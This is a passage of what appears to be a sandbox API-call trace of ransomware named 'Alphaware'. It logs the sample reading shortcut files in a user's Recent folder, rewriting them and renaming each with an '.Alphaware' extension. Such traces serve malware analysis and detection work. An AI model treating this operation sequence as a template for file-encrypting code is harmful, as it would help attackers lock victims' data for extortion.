"c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jnmmi.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2538ef8 | out: lpFileInformation=0x2538ef8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd13aab00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13aab00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13aab00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x205)) returned 1 [0096.971] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jNMMi.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jnmmi.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.971] ReadFile (in: hFile=0x250, lpBuffer=0x25393d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25393d0*, lpNumberOfBytesRead=0x23e958*=0x205, lpOverlapped=0x0) returned 1 [0096.990] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jNMMi.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jnmmi.ots.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0096.992] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jNMMi.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jnmmi.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13aab00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13aab00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c0305a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x388)) returned 1 [0096.992] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jNMMi.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jnmmi.ots.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jNMMi.ots.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jnmmi.ots.lnk.alphaware")) returned 1 [0096.993] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jo7Fjz3qQw1.lnk", dwFileAttributes=0x80) returned 1 [0096.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jo7Fjz3qQw1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jo7fjz3qqw1.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25b95e8 | out: lpFileInformation=0x25b95e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0d6b140, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d6b140, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d6b140, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xed4)) returned 1 [0096.994] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jo7Fjz3qQw1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jo7fjz3qqw1.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0096.994] ReadFile (in: hFile=0x250, lpBuffer=0x25ba790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25ba790*, lpNumberOfBytesRead=0x23e958*=0xed4, lpOverlapped=0x0) returned 1 [0097.015] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jo7Fjz3qQw1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jo7fjz3qqw1.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.017] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jo7Fjz3qQw1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jo7fjz3qqw1.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d6b140, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d6b140, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c056700, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14a0)) returned 1 [0097.017] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jo7Fjz3qQw1.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jo7fjz3qqw1.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jo7Fjz3qQw1.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jo7fjz3qqw1.lnk.alphaware")) returned 1 [0097.018] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvuGC2saBZF J.lnk", dwFileAttributes=0x80) returned 1 [0097.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvuGC2saBZF J.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvugc2sabzf j.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2443950 | out: lpFileInformation=0x2443950*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf740460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13386e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13386e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x92c)) returned 1 [0097.018] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvuGC2saBZF J.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvugc2sabzf j.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.019] ReadFile (in: hFile=0x250, lpBuffer=0x2444570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2444570*, lpNumberOfBytesRead=0x23e958*=0x92c, lpOverlapped=0x0) returned 1 [0097.053] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvuGC2saBZF J.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvugc2sabzf j.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.055] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvuGC2saBZF J.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvugc2sabzf j.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf740460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13386e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c0c8b20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd08)) returned 1 [0097.056] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvuGC2saBZF J.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvugc2sabzf j.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvuGC2saBZF J.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvugc2sabzf j.lnk.alphaware")) returned 1 [0097.057] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvxZB--pZ8D4tDAf.lnk", dwFileAttributes=0x80) returned 1 [0097.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvxZB--pZ8D4tDAf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvxzb--pz8d4tdaf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24c9868 | out: lpFileInformation=0x24c9868*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd10fd240, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10fd240, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd10fd240, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe32)) returned 1 [0097.057] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvxZB--pZ8D4tDAf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvxzb--pz8d4tdaf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.057] ReadFile (in: hFile=0x250, lpBuffer=0x24ca9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24ca9b0*, lpNumberOfBytesRead=0x23e958*=0xe32, lpOverlapped=0x0) returned 1 [0097.077] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvxZB--pZ8D4tDAf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvxzb--pz8d4tdaf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.080] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvxZB--pZ8D4tDAf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvxzb--pz8d4tdaf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10fd240, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10fd240, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c0eec80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8)) returned 1 [0097.080] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvxZB--pZ8D4tDAf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvxzb--pz8d4tdaf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jvxZB--pZ8D4tDAf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\jvxzb--pz8d4tdaf.lnk.alphaware")) returned 1 [0097.082] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k3 HQLaJEyY.lnk", dwFileAttributes=0x80) returned 1 [0097.082] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k3 HQLaJEyY.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\k3 hqlajeyy.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2552a68 | out: lpFileInformation=0x2552a68*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd14db600, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14db600, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1358)) returned 1 [0097.082] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k3 HQLaJEyY.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\k3 hqlajeyy.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.082] ReadFile (in: hFile=0x250, lpBuffer=0x2552d20, nNumberOfBytesToRead=0x1358, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2552d20*, lpNumberOfBytesRead=0x23e958*=0x1358, lpOverlapped=0x0) returned 1 [0097.102] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k3 HQLaJEyY.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\k3 hqlajeyy.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.104] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k3 HQLaJEyY.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\k3 hqlajeyy.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14db600, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c13af40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aa0)) returned 1 [0097.104] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k3 HQLaJEyY.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\k3 hqlajeyy.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k3 HQLaJEyY.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\k3 hqlajeyy.lnk.alphaware")) returned 1 [0097.105] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kbuOLBA.swf.lnk", dwFileAttributes=0x80) returned 1 [0097.105] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kbuOLBA.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kbuolba.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25de5e8 | out: lpFileInformation=0x25de5e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd135e840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd135e840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd135e840, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x211)) returned 1 [0097.105] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kbuOLBA.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kbuolba.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.106] ReadFile (in: hFile=0x250, lpBuffer=0x25dead0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25dead0*, lpNumberOfBytesRead=0x23e958*=0x211, lpOverlapped=0x0) returned 1 [0097.126] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kbuOLBA.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kbuolba.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.128] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kbuOLBA.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kbuolba.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd135e840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd135e840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c1610a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3a0)) returned 1 [0097.128] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kbuOLBA.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kbuolba.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kbuOLBA.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kbuolba.swf.lnk.alphaware")) returned 1 [0097.129] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kpu4EiFJZv7i.swf.lnk", dwFileAttributes=0x80) returned 1 [0097.130] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kpu4EiFJZv7i.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kpu4eifjzv7i.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x245e0f8 | out: lpFileInformation=0x245e0f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1716aa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1716aa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdf7)) returned 1 [0097.130] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kpu4EiFJZv7i.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kpu4eifjzv7i.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.130] ReadFile (in: hFile=0x250, lpBuffer=0x245f200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x245f200*, lpNumberOfBytesRead=0x23e958*=0xdf7, lpOverlapped=0x0) returned 1 [0097.148] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kpu4EiFJZv7i.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kpu4eifjzv7i.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.150] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kpu4EiFJZv7i.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kpu4eifjzv7i.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1716aa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c1ad360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1374)) returned 1 [0097.150] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kpu4EiFJZv7i.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kpu4eifjzv7i.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kpu4EiFJZv7i.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kpu4eifjzv7i.swf.lnk.alphaware")) returned 1 [0097.151] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kxX8q7znVEV6F AiDQyX.lnk", dwFileAttributes=0x80) returned 1 [0097.151] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kxX8q7znVEV6F AiDQyX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kxx8q7znvev6f aidqyx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24e7708 | out: lpFileInformation=0x24e7708*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0c144e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0c144e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0c144e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13c6)) returned 1 [0097.151] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kxX8q7znVEV6F AiDQyX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kxx8q7znvev6f aidqyx.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0097.151] ReadFile (in: hFile=0x250, lpBuffer=0x24e7a20, nNumberOfBytesToRead=0x13c6, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24e7a20*, lpNumberOfBytesRead=0x23e958*=0x13c6, lpOverlapped=0x0) returned 1 [0097.170] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kxX8q7znVEV6F AiDQyX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kxx8q7znvev6f aidqyx.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0097.172] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kxX8q7znVEV6F AiDQyX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kxx8q7znvev6f aidqyx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c144e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0c144e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8c1d34c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b34)) returned 1 [0097.172] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kxX8q7znVEV6F AiDQyX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kxx8q7znvev6f aidqyx.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kxX8q7znVEV6F AiDQyX.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\kxx8q7znvev6f aidqyx.lnk.alphaware")) returned 1 [0097.174] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\m66Nad.lnk", dwFileAttributes=0x80) returned 1 [0097.176] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\m66Nad.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\m66nad.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2573858 | out: lpFileInformation=0x2573858*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf84ae00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf84ae00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf84ae00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, 